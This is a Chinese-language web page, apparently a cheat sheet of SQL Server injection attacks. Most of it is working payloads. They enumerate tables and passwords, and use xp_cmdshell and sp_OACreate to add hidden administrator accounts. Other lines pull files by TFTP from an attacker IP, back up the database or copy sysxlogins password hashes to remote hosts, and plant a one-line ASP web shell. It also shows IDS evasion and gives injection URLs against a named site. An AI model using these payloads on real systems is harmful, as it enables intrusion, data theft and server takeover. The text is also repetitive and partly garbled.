 程式師世界 >> 數據庫知識 >> SqlServer數據庫 >> 關於SqlServer >> Sql server常見注入漏洞利用

Sql server常見注入漏洞利用


一句有毛病的語句: sql="select pwd,answer from [member] where userID='"&userID&"' and answer='"&answer&"'"
  這麼低級的錯誤也會犯,此時,您只要根據sql構造一個特殊的用戶名和密碼,如:' or '1'='1 一句有毛病的語句: sql="select pwd,answer from [member] where userID='"&userID&"' and answer='"&answer&"'"
  這麼低級的錯誤也會犯,此時,您只要根據sql構造一個特殊的用戶名和密碼,如:' or '1'='1 1.判斷有無注入點
; and 1=1 and 1=2
2.猜表一般的表的名稱無非是admin adminuser user pass passWord 等..
and 0<>(select count(*) from *)
and 0<>(select count(*) from admin) ---判斷是否存在admin這張表

3.猜帳號數目 如果遇到0< 返回正確頁面 1<返回錯誤頁面說明帳號數目就是1個
and 0<(select count(*) from admin)
and 1<(select count(*) from admin) 4.猜解字段名稱 在len( ) 括號裡面加上我們想到的字段名稱.
and 1=(select count(*) from admin where len(*)>0)--
and 1=(select count(*) from admin where len(用戶字段名稱name)>0)
and 1=(select count(*) from admin where len(_blank>密碼字段名稱passWord)>0) 5.猜解各個字段的長度 猜解長度就是把>0變換 直到返回正確頁面為止
and 1=(select count(*) from admin where len(*)>0)
and 1=(select count(*) from admin where len(name)>6) 錯誤
and 1=(select count(*) from admin where len(name)>5) 正確 長度是6
and 1=(select count(*) from admin where len(name)=6) 正確 and 1=(select count(*) from admin where len(passWord)>11) 正確
and 1=(select count(*) from admin where len(passWord)>12) 錯誤 長度是12
and 1=(select count(*) from admin where len(passWord)=12) 正確 6.猜解字符
and 1=(select count(*) from admin where left(name,1)=a) ---猜解用戶帳號的第一位
and 1=(select count(*) from admin where left(name,2)=ab)---猜解用戶帳號的第二位 and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) --
這個查詢語句可以猜解中文的用戶和_blank>密碼.只要把後面的數字換成中文的ASSIC碼就OK.最後把結果再轉換成字符. group by users.id having 1=1--
group by users.id, users.username, users.passWord, users.privs having 1=1--
; insert into users values( 666, attacker, foobar, 0xffff )-- UNION SELECT TOP 1 COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS WHERE TABLE_blank>_NAME=logintable-
UNION SELECT TOP 1 COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS WHERE TABLE_blank>_NAME=logintable WHERE COLUMN_blank>_NAME NOT IN (login_blank>_id,login_blank>_name)-
UNION SELECT TOP 1 login_blank>_name FROM logintable-
UNION SELECT TOP 1 passWord FROM logintable where login_blank>_name=Rahul-- 看_blank>服務器打的補丁=出錯了打了SP4補丁
and 1=(select @@VERSION)-- 看_blank>數據庫連接賬號的權限,返回正常,證明是_blank>服務器角色sysadmin權限。
and 1=(SELECT IS_blank>_SRVROLEMEMBER(sysadmin))-- 判斷連接_blank>數據庫帳號。(采用SA賬號連接 返回正常=證明了連接賬號是SA)
and sa=(SELECT System_blank>_user)--
and user_blank>_name()=dbo--
and 0<>(select user_blank>_name()-- 看xp_blank>_cmdshell是否刪除
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = X AND name = xp_blank>_cmdshell)-- xp_blank>_cmdshell被刪除,恢復,支持絕對路徑的恢復
;EXEC master.dbo.sp_blank>_addextendedproc xp_blank>_cmdshell,xplog70.dll--
;EXEC master.dbo.sp_blank>_addextendedproc xp_blank>_cmdshell,c:\inetpub\wwwroot\xplog70.dll-- 反向PING自己實驗
;use master;declare @s int;exec sp_blank>_oacreate "wscript.shell",@s out;exec sp_blank>_oamethod @s,"run",NULL,"cmd.exe /c ping";-- 加帳號
;DECLARE @shell INT EXEC SP_blank>_OACREATE wscript.shell,@shell OUTPUT EXEC SP_blank>_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add-- 創建一個虛擬目錄E盤:
;declare @o int exec sp_blank>_oacreate wscript.shell, @o out exec sp_blank>_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "默認Web站點" -v "e","e:\"-- 訪問屬性:(配合寫入一個webshell)
declare @o int exec sp_blank>_oacreate wscript.shell, @o out exec sp_blank>_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\chAccess.vbs -a w3svc/1/ROOT/e +browse
爆庫 特殊_blank>技巧::%5c=\ 或者把/和\ 修改%5提交
and 0<>(select top 1 paths from newtable)-- 得到庫名(從1到5都是系統的id,6以上才可以判斷)
and 1=(select name from master.dbo.sysdatabases where dbid=7)--
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
依次提交 dbid = 7,8,9.... 得到更多的_blank>數據庫名 and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U) 暴到一個表 假設為 admin
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U and name not in (Admin)) 來得到其他的表。
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype=U and name=admin
and uid>(str(id))) 暴到UID的數值假設為18779569 uid=id
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569) 得到一個admin的一個字段,假設為 user_blank>_id
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in
(id,...)) 來暴出其他的字段
and 0<(select user_blank>_id from BBS.dbo.admin where username>1) 可以得到用戶名
依次可以得到_blank>密碼。。。。。假設存在user_blank>_id username ,passWord 等字段 and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U) 得到表名
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U and name not in(Address))
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype=U and name=admin and uid>(str(id))) 判斷id值
and 0<>(select top 1 name from BBS.dbo.syscolumns where id=773577794) 所有字段 ?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin (union,Access也好用) 得到WEB路徑
;create table [dbo].[swap] ([swappass][char](255));--
and (select top 1 swappass from swap)=1--
;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_blank>_regread @rootkey=HKEY_blank>_LOCAL_blank>_MacHINE, @key=SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\, @value_blank>_name=/, values=@test OUTPUT insert into paths(path) values(@test)--
;use ku1;--
;create table cmd (str image);-- 建立image類型的表cmd 存在xp_blank>_cmdshell的測試過程:
;exec master..xp_blank>_cmdshell dir
;exec master.dbo.sp_blank>_addlogin jiaoniang$;-- 加SQL帳號
;exec master.dbo.sp_blank>_passWord null,jiaoniang$,1866574;--
;exec master.dbo.sp_blank>_addsrvrolemember jiaoniang$ sysadmin;--
;exec master.dbo.xp_blank>_cmdshell net user jiaoniang$ 1866574 /workstations:* /times:all /passwordchg:yes /passWordreq:yes /active:yes /add;--
;exec master.dbo.xp_blank>_cmdshell net localgroup administrators jiaoniang$ /add;--
exec master..xp_blank>_servicecontrol start, schedule 啟動_blank>服務
exec master..xp_blank>_servicecontrol start, server
; DECLARE @shell INT EXEC SP_blank>_OACREATE wscript.shell,@shell OUTPUT EXEC SP_blank>_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add
;DECLARE @shell INT EXEC SP_blank>_OACREATE wscript.shell,@shell OUTPUT EXEC SP_blank>_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net localgroup administrators jiaoniang$ /add
; exec master..xp_blank>_cmdshell tftp -i youip get file.exe-- 利用TFTP上傳文件 ;declare @a sysname set @a=xp_blank>_+cmdshell exec @a dir c:\
;declare @a sysname set @a=xp+_blank>_cm'+'dshell exec @a dir c:\
;declare @a;set @a=db_blank>_name();backup database @a to disk=你的IP你的共享目錄bak.dat select * from openrowset(_blank>sqloledb,server;sa;,select OK! exec master.dbo.sp_blank>_addlogin hax) 查詢構造:
SELECT * FROM news WHERE id=... AND topic=... AND .....
adminand 1=(select count(*) from [user] where username=victim and right(left(userpass,01),1)=1) and userpass <>
select 123;--
;use master;--
:a or name like fff%;-- 顯示有一個叫ffff的用戶哈。
and 1<>(select count(email) from [user]);--
;update [users] set email=(select top 1 name from sysobjects where xtype=u and status>0) where name=ffff;--
;update [users] set email=(select top 1 id from sysobjects where xtype=u and name=ad) where name=ffff;--
;update [users] set email=(select top 1 name from sysobjects where xtype=u and id>581577110) where name=ffff;--
;update [users] set email=(select top 1 count(id) from passWord) where name=ffff;--
;update [users] set email=(select top 1 pwd from passWord where id=2) where name=ffff;--
;update [users] set email=(select top 1 name from passWord where id=2) where name=ffff;--
然後根據表名ad得到這個表的ID 得到第二個表的名字 insert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)--
insert into users values( 667,123,123,0xffff)--
insert into users values ( 123, admin--, passWord, 0xffff)--
;and user>0
;and (select count(*) from sysobjects)>0
;and (select count(*) from mysysobjects)>0 //為Access_blank>數據庫 枚舉出數據表名
;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0);--
讀出第一個表,第二個表可以這樣讀出來(在條件後加上 and name<>剛才得到的表名)。
;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0 and name<>vote);--
然後id=1552 and exists(select * from aaa where aaa>5) 讀字段是這樣:
;update aaa set aaa=(select top 1 col_blank>_name(object_blank>_id(表名),1));--
然後id=152 and exists(select * from aaa where aaa>5)出錯,得到字段名
;update aaa set aaa=(select top 1 col_blank>_name(object_blank>_id(表名),2));--
然後id=152 and exists(select * from aaa where aaa>5)出錯,得到字段名 [獲得數據表名][將字段值更新為表名,再想法讀出這個字段的值就可得到表名]
update 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>你得到的表名 查出一個加一個]) [ where 條件] select top 1 name from sysobjects where xtype=u and status>0 and name not in(table1,table2,...)
通過SQLSERVER注入_blank>漏洞建_blank>數據庫管理員帳號和系統管理員帳號[當前帳號必須是SYSADMIN組] [獲得數據表字段名][將字段值更新為字段名,再想法讀出這個字段的值就可得到字段名]
update 表名 set 字段=(select top 1 col_blank>_name(object_blank>_id(要查詢的數據表名),字段列如:1) [ where 條件] 繞過IDS的檢測[使用變量]
;declare @a sysname set @a=xp_blank>_+cmdshell exec @a dir c:\
;declare @a sysname set @a=xp+_blank>_cm'+'dshell exec @a dir c:\ 1、 開啟遠程_blank>數據庫 select * from OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1 )
參數: (1) OLEDB Provider name
2、 其中連接字符串參數可以是任何端口用來連接,比如
select * from OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=,1433;, select * from table
insert into OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1) select * from table2
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=,1433;,select * from table1) select * from table2
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=,1433;,select * from _blank>_sysdatabases)
select * from master.dbo.sysdatabases
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=,1433;,select * from _blank>_sysobjects)
select * from user_blank>_database.dbo.sysobjects
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=,1433;,select * from _blank>_syscolumns)
select * from user_blank>_database.dbo.syscolumns
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=,1433;,select * from table1) select * from database..table1
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=,1433;,select * from table2) select * from database..table2 復制哈西表(HASH)登錄_blank>密碼的hash存儲於sysxlogins中。方法如下:
insert into OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=,1433;,select * from _blank>_sysxlogins) select * from database.dbo.sysxlogins
得到hash之後,就可以進行暴力破解。遍歷目錄的方法: 先創建一個臨時表:temp
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_blank>_availablemedia;-- 獲得當前所有驅動器
;insert into temp(id) exec master.dbo.xp_blank>_subdirs c:\;-- 獲得子目錄列表
;insert into temp(id,num1) exec master.dbo.xp_blank>_dirtree c:\;-- 獲得所有子目錄的目錄樹結構,並寸入temp表中
;insert into temp(id) exec master.dbo.xp_blank>_cmdshell type c:\web\index.ASP;-- 查看某個文件的內容
;insert into temp(id) exec master.dbo.xp_blank>_cmdshell dir c:\;--
;insert into temp(id) exec master.dbo.xp_blank>_cmdshell dir c:\ *.ASP /s/a;--
;insert into temp(id) exec master.dbo.xp_blank>_cmdshell cscript C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc
;insert into temp(id,num1) exec master.dbo.xp_blank>_dirtree c:\;-- (xp_blank>_dirtree適用權限PUBLIC) 語句1:and 1=(SELECT IS_blank>_SRVROLEMEMBER(sysadmin));--
語句2:and 1=(SELECT IS_blank>_SRVROLEMEMBER(serveradmin));--
語句3:and 1=(SELECT IS_blank>_SRVROLEMEMBER(setupadmin));--
語句4:and 1=(SELECT IS_blank>_SRVROLEMEMBER(securityadmin));--
語句5:and 1=(SELECT IS_blank>_SRVROLEMEMBER(securityadmin));--
語句6:and 1=(SELECT IS_blank>_SRVROLEMEMBER(diskadmin));--
語句7:and 1=(SELECT IS_blank>_SRVROLEMEMBER(bulkadmin));--
語句8:and 1=(SELECT IS_blank>_SRVROLEMEMBER(bulkadmin));--
語句9:and 1=(SELECT IS_blank>_MEMBER(db_blank>_owner));-- 把路徑寫到表中去:
;create table dirs(paths varchar(100), id int)--
;insert dirs exec master.dbo.xp_blank>_dirtree c:\--
and 0<>(select top 1 paths from dirs)--
and 0<>(select top 1 paths from dirs where paths not in(@Inetpub))--
;create table dirs1(paths varchar(100), id int)--
;insert dirs exec master.dbo.xp_blank>_dirtree e:\web--
and 0<>(select top 1 paths from dirs1)-- 把_blank>數據庫備份到網頁目錄:下載
;declare @a sysname; set @a=db_blank>_name();backup database @a to disk=e:\web\down.bak;-- and 1=(Select top 1 name from(Select top 12 id,name from sysobjects where xtype=char(85)) T order by id desc)
and 1=(Select Top 1 col_blank>_name(object_blank>_id(USER_blank>_LOGIN),1) from sysobjects) 參看相關表。
and 1=(select user_blank>_id from USER_blank>_LOGIN)
and 0=(select user from USER_blank>_LOGIN where user>1) -=- wscript.shell example -=-
declare @o int
exec sp_blank>_oacreate wscript.shell, @o out
exec sp_blank>_oamethod @o, run, NULL, notepad.exe
; declare @o int exec sp_blank>_oacreate wscript.shell, @o out exec sp_blank>_oamethod @o, run, NULL, notepad.exe-- declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_blank>_oacreate scripting.filesystemobject, @o out
exec sp_blank>_oamethod @o, opentextfile, @f out, c:\boot.ini, 1
exec @ret = sp_blank>_oamethod @f, readline, @line out
while( @ret = 0 )
print @line
exec @ret = sp_blank>_oamethod @f, readline, @line out
end declare @o int, @f int, @t int, @ret int
exec sp_blank>_oacreate scripting.filesystemobject, @o out
exec sp_blank>_oamethod @o, createtextfile, @f out, c:\inetpub\wwwroot\foo.ASP, 1
exec @ret = sp_blank>_oamethod @f, writeline, NULL,
<% set o = server.createobject("wscript.shell"): o.run( request.querystring("cmd") ) %> declare @o int, @ret int
exec sp_blank>_oacreate speech.voicetext, @o out
exec sp_blank>_oamethod @o, register, NULL, foo, bar
exec sp_blank>_oasetproperty @o, speed, 150
exec sp_blank>_oamethod @o, speak, NULL, all your sequel servers are belong to,us, 528
waitfor delay 00:00:05 ; declare @o int, @ret int exec sp_blank>_oacreate speech.voicetext, @o out exec sp_blank>_oamethod @o, register, NULL, foo, bar exec sp_blank>_oasetproperty @o, speed, 150 exec sp_blank>_oamethod @o, speak, NULL, all your sequel servers are belong to us, 528 waitfor delay 00:00:05-- xp_blank>_dirtree適用權限PUBLIC
exec master.dbo.xp_blank>_dirtree c:\
create table dirs(paths varchar(100), id int)
insert dirs exec master.dbo.xp_blank>_dirtree c:\

http://www.xxx.com/xxxnews/shownews.ASP?id=51;declare @a int--

http://www.xxx.com/xxxnews/shownews.ASP?id=51 and (Select count(1) from [sysobjects])>=0

http://www.xxx.com/xxxnews/shownews.ASP?id=51 And user%2Bchar(124)=0

當前用戶是否為 sysadmin 固定服務器角色的成員。
http://www.xxx.com/xxxnews/shownews.ASP?id=51 And Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1

PS:0x730079007300610064006D0069006E00 = sysadmin

當前用戶是否為 db_owner 固定數據庫角色的成員
http://www.xxx.com/xxxnews/shownews.ASP?id=51 And Cast(IS_MEMBER(0x640062005F006F0077006E0065007200) as varchar(1))%2Bchar(124)=1

0x640062005F006F0077006E0065007200 = db_owner

http://www.xxx.com/xxxnews/shownews.ASP?id=51 And db_name()%2Bchar(124)=0

http://www.99568.com/99568news/shownews.ASP?id=51 And @@version = 1

http://www.99568.com/99568news/shownews.ASP?id=51 And @@SERVERNAME = 1

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